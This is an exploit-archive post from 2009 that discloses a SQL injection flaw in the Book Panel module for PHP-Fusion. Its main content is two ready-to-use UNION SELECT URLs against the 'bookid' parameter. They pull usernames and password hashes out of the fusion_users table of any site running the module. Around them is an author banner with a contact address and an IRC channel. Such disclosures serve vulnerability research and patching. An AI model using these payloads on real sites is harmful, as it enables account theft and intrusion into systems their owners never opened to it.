[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability
# Published : 2009-03-09
# Author : elusiven
# Previous Title : phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities
# Next Title : Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability


/+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                                                                       +
+  |----------------------------------------------------------------|                                                   +
+  | PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability |                                                   +
+  |----------------------------------------------------------------|                                                   +
+                                                                                                                       +
+   [-] ...Cos co robie z czystej pasji, cos co lubie i czym sie fascynuje :-)                                          +
+                                                                                                                       +
+  |--------------------------------|                                                                                   +
+  | Author: elusiven from Poland ! |                                                                                   +
+  | Contact: elusivenpl@gmail.com  |                                                                                   +
+  | Greetings: Fusi0n Group        |                                                                                   +
+  |--------------------------------|                                                                                   +
+                                                                                                                       +
+   Exploit:                                                                                                            +
+                                                                                                                       +
+   http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--         +
+   http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users--     +
+                                                                                                                       +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/

/join #wyjadacze on irc.quakenet.org

# www.Syue.com [2009-03-09]